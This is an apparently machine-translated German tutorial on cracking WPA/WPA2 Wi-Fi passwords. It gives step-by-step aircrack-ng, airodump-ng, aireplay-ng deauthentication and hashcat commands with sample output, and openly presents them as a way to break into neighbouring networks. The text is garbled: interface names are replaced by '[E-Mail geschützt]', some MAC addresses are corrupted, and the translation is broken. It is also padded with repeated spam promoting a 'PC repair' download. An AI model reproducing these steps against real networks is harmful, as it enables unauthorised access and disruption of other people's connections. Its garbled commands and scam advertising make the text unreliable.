So knacken Sie WPAWPA2-WLAN-Passwörter über Hashcat u0026 amp; Aircrack-ng

Aktualisiert Marsch 2023: Erhalten Sie keine Fehlermeldungen mehr und verlangsamen Sie Ihr System mit unserem Optimierungstool. Holen Sie es sich jetzt unter - > diesem Link

  1. Downloaden und installieren Sie das Reparaturtool hier.
  2. Lassen Sie Ihren Computer scannen.
  3. Das Tool wird dann deinen Computer reparieren.

In diesem Handbuch werden wir Ihnen helfen, wie Sie WiFi-Netzwerke mit zwei der besten drahtlosen Hacking-Tools knacken können, die mit einem schwachen Passwort geschützt sind. Wir werden Schritt für Schritt detailliert beschreiben, wie Sie WPA2 mit aircrack-ng und hashcat hacken können, obwohl dies nicht erschöpfend ist. Dies sind genug Informationen, damit die Benutzer ihre Netzwerksicherheit testen oder in eine nahegelegene eindringen können.

Der unten beschriebene Angriff ist vollständig passiv und kann nicht erkannt werden, vorausgesetzt, das Kennwort lautet wurde geknackt, wird von Ihnen nicht verwendet. Um den Aufklärungsprozess zu beschleunigen, kann ein optionaler De-Authentifizierungs-Angriff verwendet werden. Außerdem können Sie bis zum Ende des Handbuchs mehr darüber erfahren.

Wenn Sie irgendwie ein wenig Know-how in Bezug auf diesen Prozess haben, dann Sie Sie müssen die Beschreibungen nicht kennen. Springen Sie einfach zur Liste der Befehle, die unten verwendet wurden.

Wichtige Hinweise:

Mit diesem Tool können Sie PC-Problemen vorbeugen und sich beispielsweise vor Dateiverlust und Malware schützen. Außerdem ist es eine großartige Möglichkeit, Ihren Computer für maximale Leistung zu optimieren. Das Programm behebt häufige Fehler, die auf Windows-Systemen auftreten können, mit Leichtigkeit - Sie brauchen keine stundenlange Fehlersuche, wenn Sie die perfekte Lösung zur Hand haben:

  • Schritt 1: Laden Sie das PC Repair & Optimizer Tool herunter (Windows 11, 10, 8, 7, XP, Vista - Microsoft Gold-zertifiziert).
  • Schritt 2: Klicken Sie auf "Scan starten", um Probleme in der Windows-Registrierung zu finden, die zu PC-Problemen führen könnten.
  • Schritt 3: Klicken Sie auf "Alles reparieren", um alle Probleme zu beheben.

herunterladen

Hinweis: Denken Sie daran, dass dieses Tutorial nur ist zu Bildungszwecken und sollte nicht für illegale Aktivitäten verwendet werden. Der Autor ist für keinerlei Verwendung verantwortlich.

Die benötigten Tools

  • Stellen Sie sicher, dass Sie mit der Linux-Befehlszeile vertraut sind.
  • Stellen Sie sicher, dass entweder Kali Linux oder Kali NetHunter installiert ist.
  • Stellen Sie nun sicher, dass Aircrack-ng heruntergeladen und installiert ist.
  • Das letzte Tool, das Sie benötigen, ist Hashcat.
  • John The Ripper ist eine großartige Alternative, wenn Hashcat nicht mehr für Sie funktioniert.

So knacken Sie WPA2-Passwörter mit Aircrack-ng a nd Hashcat (Tutorial)

Aktivieren Sie den Überwachungsmodus in Ihrem WLAN-Adapter.

Sie müssen zunächst die drahtlosen Interaktionen auflisten, die den Überwachungsmodus unterstützen mit:

Airmon-ng

Wenn keine Schnittstelle aufgeführt ist, dann Dies bedeutet, dass Ihre WLAN-Karte den Überwachungsmodus nicht unterstützt. Wir können davon ausgehen, dass der Name der drahtlosen Schnittstelle [E-Mail-geschützt] ist. Stellen Sie sicher, dass Sie den richtigen Namen verwenden, wenn er davon abweicht. Dann versetzen wir die Schnittstelle in den Überwachungsmodus:

Airmon-ng start [email protected]

Danach müssen Sie iwconfig ausführen. Sie können nun einen neuen Überwachungsmodus sehen, der wie m [E-Mail geschützt] oder [E-Mail geschützt] aufgeführt ist.

Suchen Sie Ihren Ziel

Sie müssen über Ihre Monitorschnittstelle mit dem Abhören der 802.11 Beacon-Frames beginnen, die von den WLAN-Routern in der Nähe gesendet werden:

Airodump-ng [E-Mail geschützt]

Die folgende Ausgabe wird angezeigt:

CH 13] [Verstrichen: 52 s] [2021–03–07 16:50

BSSID PWR-Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:91:82 : F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests

14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8

14: 22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP \u0026 lt; Länge: 0 \u0026 gt;

14: 22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK gesichert Sie

9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK gesichert Sie

00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou ist der beste

06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2

78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2

9C: 34: 26: 9F: 2E: E8-85 40 0 ​​0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT

BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK root

EC: 1A: 59: 36: AD: CA-86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Jetzt werden wir das Passwort von knacken ein Netzwerk mit dem Namen gesichert. Sie müssen sich die BSSID-MAC-Adresse sowie die Kanalnummer (CH) merken, wie sie von Airodump-ng angezeigt wird, da wir beide für den nächsten Schritt benötigen.

LESEN  So hacken Sie WiFi-Passwörter im Jahr 2021 (aktualisierter PMKIDKr00k-Angriff)

So erfassen Sie a 4-Wege-Handshake in WiFi-Netzwerken

Der WPA oder WPA2 verwendet einen 4-Wege-Handshake, um Geräte im Netzwerk zu authentifizieren. Sie müssen nicht wissen, was es bedeutet, aber Sie müssen einen dieser Handshakes erfassen, um das Netzwerkkennwort zu knacken. Handshakes finden statt, wenn ein Gerät eine Verbindung zum Netzwerk herstellt, z. B. wenn Ihre Nachbarn nach Hause kommen. Wir können diesen Handshake erfassen, indem wir airmon-ng anweisen, den Verkehr auf dem Ziel mithilfe des Kanals sowie der bssid-Werte zu überwachen, die vom letzten Befehl stammen.

  • Ersetzen Sie die Werte-c und-bssid durch die Werte Ihres Zielnetzwerks
  • -w gibt das Verzeichnis an, in dem die Paketerfassung gespeichert werden soll.
  • airodump-ng-c 3-bssid 9C: 5C: 8E: C9: AB: C0-w. mon0
  • CH 6] [Verstrichen: 1 Minute] [2020–03–7 13:09:16]
  • BSSID PWR RXQ-Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-47 0 140 0 0 6 54e WPA2 CCMP PSK DELL

Sobald Sie den Handschlag erfasst haben Sie müssen etwas wie {WPA-Handshake: bc: d3: c9: ef: d2: 67 sehen. Dort oben rechts auf dem Bildschirm befindet sich genau rechts von der aktuellen Uhrzeit.

Wenn Sie sich ungeduldig fühlen und sich wohl fühlen Wenn Sie den aktiven Angriff verwenden, können Sie die Geräte zwingen, eine Verbindung zum Zielnetzwerk herzustellen, um die Verbindung wiederherzustellen, indem Sie böswillige De-Authentifizierungspakete an sie senden. Dies führt zur Erfassung eines 4-Wege-Handshakes.

Nachdem der Handshake erfasst wurde, müssen Sie Strg-C drücken, um Airodump-ng zu beenden. Sie sehen eine .cap-Datei, in der Sie airodump-ng angewiesen haben, die Aufnahme mit dem Namen-01.Cap zu speichern. Wir werden diese Erfassungsdatei verwenden, um das Netzwerkkennwort zu knacken. Wir werden diese Datei umbenennen, um den Netzwerknamen wiederzugeben, den wir knacken möchten:

Mv ./-01.cap gesichert .cap

Der wahre Spaß: Knacken des WPA2-Pins

Im letzten Schritt wird das Passwort mithilfe von geknackt der gefangene Händedruck. Wenn Sie Zugriff auf eine GPU haben, wird dringend empfohlen, den Hashcat zum Knacken von Passwörtern zu verwenden. Wir haben ein Tool entwickelt, mit dem der Hashcat sehr einfach zu bedienen ist, das als naiver Hashcat bezeichnet wird.

Wenn Sie keinen Zugriff auf die GPU haben, finden Sie viele GPU-Cracking-Dienste, die wie folgt verwendet werden können die GPUHASH.me oder OnlineHashCrack. Sie können auch CPU-Cracking mit dem Aircrack-ng verwenden. Wenn Sie jedoch Zeit sparen und den größten Teil Ihrer GPU verwenden möchten, sollten Sie Ihre GPU übertakten, um das Brute-Forcing zu beschleunigen.

LESEN  So beheben Sie den INET_E_Resource_NOT_Found-Fehler in Windows 10 2021

Beachten Sie, dass beide der folgenden Methoden ein vom Benutzer generiertes Kennwort voraussetzen . Viele der WPA-oder WPA2-Router werden mit zufälligen 12-stelligen Kennwörtern geliefert, die die meisten Benutzer unverändert lassen. Wir empfehlen Ihnen, die WPA-Wörterbuchdateien der wahrscheinlichen Wortlisten zu verwenden, wenn Sie eines dieser Kennwörter knacken möchten.

Verwenden von Naive-Hashcat, um die Magie auszuführen

Bevor Sie das Kennwort mit dem naiven Hashcat knacken, müssen Sie die .cap-Datei in das entsprechende Hashcat-Dateiformat .hccapx konvertieren. Dies kann sehr schnell erfolgen, indem Sie entweder die .cap-Datei auf https://hashcat.net/cap2hccapx hochladen oder direkt das cap2hccapx-Tool verwenden.

Anschließend müssen Sie sie herunterladen und in Hashcat ausführen:

# downloadgit-Klon https://github.com/brannondorsey/naive-hashcat

cd naive-hashcat

Laden Sie eine Wortliste oder eine große Wörterbuchdatei herunter:

Kennwörter Wortliste zum Knacken von WPA2-WLAN-Kennwörtern

Hashcat-Modus für WPA/WPA2, den Sie festlegen müssen:

2500 ist der Hashcat-Hash-Modus für WPA/WPA2

HASH_FILE = Secureyou.hccapx .sh

Der naive Hashcat verwendet verschiedene Angriffe wie Regel, Kombination, Maske und Wörterbuch und es kann fast 10 Tage dauern, bis die Kennwörter mittlerer Stärke ausgeführt werden. Das geknackte Passwort wird in hackme.pot gespeichert, daher müssen Sie diese Datei regelmäßig überprüfen. Sobald das Passwort geknackt wurde, wird Folgendes als Inhalt Ihrer POT_FILE angezeigt:

e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: Secureyouhacking

Die letzten beiden Dateien, die durch Folgendes getrennt wurden: sind der Name des Netzwerks bzw. das Kennwort.

Verwenden von Aircrack-ng zum Ausführen eines Wörterbuchangriffs

Das Aircrack-ng kann auch für grundlegende Wörterbuchangriffe verwendet werden, die auf Ihrer CPU ausgeführt werden. Bevor Sie die Straftat ausführen können, benötigen Sie eine Wortliste. Wir empfehlen Ihnen, die berüchtigte Rockyou-Wörterbuchdatei zu verwenden.

RockYou-Wörterbuch-Wortlistendatei herunterladen

Beachten Sie, dass das Netzwerkkennwort nicht lautet In der Wortliste dürfen Sie das Kennwort nicht knacken.

  • #-a2 gibt WPA2 an,-b ist die BSSID,-w ist die Wortdatei
  • aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap

Das sollst du Eine KEY FOUND-Nachricht im Terminal wird angezeigt, auf die eine Klartextversion des Netzwerkkennworts folgt, wenn das Kennwort geknackt ist.

  • Aircrack-ng 2.0
  • [00:01:49] 111040 getestete Schlüssel (102,73 k/s)
  • SCHLÜSSEL GEFUNDEN! [SecuredYou-Test-Umgebung]
  • Hauptschlüssel: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
  • 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
  • Übergangsschlüssel: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
  • 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
  • 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
  • 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
  • EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Durchführen der De-authentication Attack

Der De-Authentication-Angriff kann gefälschte De-Authentication-Pakete von Ihrem Computer an den Client senden, der mit dem Netzwerk verbunden ist, das Sie knacken möchten. Die Pakete enthalten gefälschte Absenderadressen, die dem Client so erscheinen, als ob sie vom Zugriffspunkt selbst gesendet wurden. Beim Empfang von Paketen wie diesen trennen sich wahrscheinlich viele Clients vom Netzwerk und stellen die Verbindung sofort wieder her, wenn Sie mit airodump-ng hören.

Sie können airodump-ng zur Überwachung verwenden einen bestimmten Zugriffspunkt (unter Verwendung von –c channel –bssid MAC), es sei denn und bis Sie sehen, dass ein Client (STATION) verbunden ist. Ein verbundener Client sieht fast so aus, wobei 64: BC: 0C: 48: 97: F7 der Client-MAC ist.

  • CH 7] [Abgelaufen: 4 Minuten] [2020–03-08 20:24]
  • BSSID PWR RXQ-Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
  • BSSID STATION PWR Rate verlorene Frames Prob
  • 9C: 5C: 8E: C9: AB: C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell

Jetzt müssen Sie airodump-ng laufen lassen und Öffnen Sie ein neues Terminal. Wir werden einen airplay-ng-Befehl verwenden, um gefälschte De-Auth-Pakete an den Client des Opfers zu senden, wodurch dieser gezwungen wird, sich wieder mit dem Netzwerk zu verbinden und dabei hoffentlich einen Handschlag zu erhalten.

  • -0 3 gibt an, dass 3 Deauth-Pakete gesendet werden sollen. Erhöhen Sie diese Anzahl
  • , wenn das Risiko besteht, dass die Client-Netzwerkaktivität merklich unterbrochen wird.
  • -a ist der MAC des Zugriffspunkts
  • -c ist der MAC des Clients
  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0

Mit dem folgenden Befehl können Sie auch Deauth-Pakete an alle verbundenen Clients in einem drahtlosen Netzwerk senden:

  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0

Sobald Sie die Deauth-Pakete senden Sie müssen zum Airodumping-Prozess zurückkehren, und wenn Sie Glück haben, können Sie dort oben rechts so etwas sehen [WPA-Handshake: 9C: 6C: 9E: D7: 8G: C0. Nachdem der Handshake erfasst wurde, können Sie das Netzwerkkennwort knacken.

Videoversion des Tutorials

Wenn Sie jemand sind, der lernt Wenn Sie jemand anderem dabei zuschauen, finden Sie unten eine Videoversion für Sie.

Hacken von WPA2-Funkkennwörtern mit Aircrack-ng/Hashcat

Alternative drahtlose Hacking-Tools, die Sie verwenden können:

  • Kismet kostenloser Download-WiFi Sniffer
  • Reaver WPS Pin Cracker Download
  • 15 Beste kostenlose Hacking-Tools und Sicherheitstools zum Herunterladen.

Letzte Wörter

Haftungsausschluss: Dies ist nur eine Simulation, wie jemand WPA2-Passwörter mit Tools wie Hashcat und Aircrack-ng knacken kann. Diese Art von Aktivität sollte nur in einer kontrollierten Umgebung durchgeführt werden, in der die Erlaubnis erteilt wurde. Ich hoffe jedoch, dass Ihnen dieses umfassende Tutorial gefallen hat und Sie das Beste daraus gemacht haben.

adminguides

Schreibe einen Kommentar